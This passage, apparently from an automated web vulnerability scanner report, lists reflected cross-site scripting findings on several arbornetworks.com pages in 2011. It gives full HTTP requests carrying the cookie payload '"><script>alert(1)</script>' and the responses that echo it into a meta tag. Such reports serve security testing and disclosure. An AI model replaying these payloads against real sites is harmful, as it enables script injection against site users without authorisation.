Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en6eaac"><script>alert(1)</script>506cb8ffb11; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:53:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=0334d60269ba7b2713cf2ec3bc3eb1a5; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:53:35 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:53:35 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:53:36 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:53:37 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="en6eaac\"><script>alert(1)</script>506cb8ffb11">
...[SNIP]...

3.146. http://www.arbornetworks.com/en/network-security-monitoring-solutions-for-your-industry.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/network-security-monitoring-solutions-for-your-industry.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68ce7"><script>alert(1)</script>36f0a831d17 was submitted in the mbfcookie[lang] cookie. This input was echoed as 68ce7\"><script>alert(1)</script>36f0a831d17 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/network-security-monitoring-solutions-for-your-industry.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en68ce7"><script>alert(1)</script>36f0a831d17; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:49:59 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=4c85c8c200e6261bcaa26b721b6bfaa8; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:50:00 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:50:00 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:50:01 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:50:01 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<meta lang="en68ce7\"><script>alert(1)</script>36f0a831d17">
...[SNIP]...

3.147. http://www.arbornetworks.com/en/network-security-research-2.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/network-security-research-2.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fba46"><script>alert(1)</script>e9a751b4cd1 was submitted in the mbfcookie[lang] cookie. This input was echoed as fba46\"><script>alert(1)</script>e9a751b4cd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/network-security-research-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enfba46"><script>alert(1)</script>e9a751b4cd1; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:52:59 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=2df89d8416b69bee970701cde6d4e0ba; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:53:00 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:53:00 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:53:01 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:53:01 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: PartnerSale
...[SNIP]...
<meta lang="enfba46\"><script>alert(1)</script>e9a751b4cd1">
...[SNIP]...

3.148. http://www.arbornetworks.com/en/network-security-visibility-products-235.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/network-security-visibility-products-235.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b951"><script>alert(1)</script>d5453ad5523 was submitted in the mbfcookie[lang] cookie. This input was echoed as 6b951\"><script>alert(1)</script>d5453ad5523 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/network-security-visibility-products-235.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en6b951"><script>alert(1)</script>d5453ad5523; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:49:13 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=93ec880098c8903f7b6b1ba2875f8aad; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:49:14 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:49:14 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:49:15 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:49:15 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<meta lang="en6b951\"><script>alert(1)</script>d5453ad5523">
...[SNIP]...

3.149. http://www.arbornetworks.com/en/network-solutions-we-provide.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/network-solutions-we-provide.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a99e4"><script>alert(1)</script>5e86c72a29f was submitted in the mbfcookie[lang] cookie. This input was echoed as a99e4\"><script>alert(1)</script>5e86c72a29f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/network-solutions-we-provide.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=ena99e4"><script>alert(1)</script>5e86c72a29f; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:49:16 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=7c604efe1488060ed8676eaa89a27f51; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:49:17 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:49:17 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:49:18 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:49:19 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="ena99e4\"><script>alert(1)</script>5e86c72a29f">
...[SNIP]...

3.150. http://www.arbornetworks.com/en/news-events.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/news-events.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ceac"><script>alert(1)</script>63f3f812b9a was submitted in the mbfcookie[lang] cookie. This input was echoed as 9ceac\"><script>alert(1)</script>63f3f812b9a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/news-events.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en9ceac"><script>alert(1)</script>63f3f812b9a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:56:34 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=3864b6386fb87cc81c2b0c8600ee076b; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:56:34 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:56:34 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:56:35 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:56:35 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<meta lang="en9ceac\"><script>alert(1)</script>63f3f812b9a">
...[SNIP]...

3.151. http://www.arbornetworks.com/en/partnership-inquiry-form.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/partnership-inquiry-form.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb73d"><script>alert(1)</script>c71247202a3 was submitted in the mbfcookie[lang] cookie. This input was echoed as bb73d\"><script>alert(1)</script>c71247202a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/partnership-inquiry-form.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enbb73d"><script>alert(1)</script>c71247202a3; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:55:56 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=e1132c7739108d4aa136163325c8a1c5; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:55:56 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:55:56 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:55:57 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:56:52 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="enbb73d\"><script>alert(1)</script>c71247202a3">
...[SNIP]...

3.152. http://www.arbornetworks.com/en/services-network-support-maintenance-training-2.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/services-network-support-maintenance-training-2.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b712"><script>alert(1)</script>d3b5d470576 was submitted in the mbfcookie[lang] cookie. This input was echoed as 1b712\"><script>alert(1)</script>d3b5d470576 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/services-network-support-maintenance-training-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en1b712"><script>alert(1)</script>d3b5d470576; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:49:38 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=1a10bc0dd348e32891785e5c1c7aa6e6; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:49:39 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:49:39 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:49:40 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:49:41 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<meta lang="en1b712\"><script>alert(1)</script>d3b5d470576">
...[SNIP]...

3.153. http://www.arbornetworks.com/en/solution-partners-4.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/solution-partners-4.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c1e4"><script>alert(1)</script>7b05d39a8bb was submitted in the mbfcookie[lang] cookie. This input was echoed as 4c1e4\"><script>alert(1)</script>7b05d39a8bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/solution-partners-4.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en4c1e4"><script>alert(1)</script>7b05d39a8bb; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:53:55 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=9af230516344f96bbe970bf33d278e37; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:53:56 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:53:56 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:53:57 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:53:58 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="en4c1e4\"><script>alert(1)</script>7b05d39a8bb">
...[SNIP]...

3.154. http://www.arbornetworks.com/en/solutions-for-places-in-your-network.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/solutions-for-places-in-your-network.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5446"><script>alert(1)</script>29761611793 was submitted in the mbfcookie[lang] cookie. This input was echoed as f5446\"><script>alert(1)</script>29761611793 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/solutions-for-places-in-your-network.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enf5446"><script>alert(1)</script>29761611793; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:50:19 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=8780a402deff999d6ab9f141654291b0; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:50:21 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:50:21 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:50:22 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:50:22 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<meta lang="enf5446\"><script>alert(1)</script>29761611793">
...[SNIP]...

3.155. http://www.arbornetworks.com/en/solutions-for-your-business-needs.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/solutions-for-your-business-needs.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64ac0"><script>alert(1)</script>6ebae96397e was submitted in the mbfcookie[lang] cookie. This input was echoed as 64ac0\"><script>alert(1)</script>6ebae96397e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/solutions-for-your-business-needs.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en64ac0"><script>alert(1)</script>6ebae96397e; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:50:17 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=604541f1f9e41149b2fb1c9dd4446d9a; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:50:18 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:50:18 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:50:19 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:50:19 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
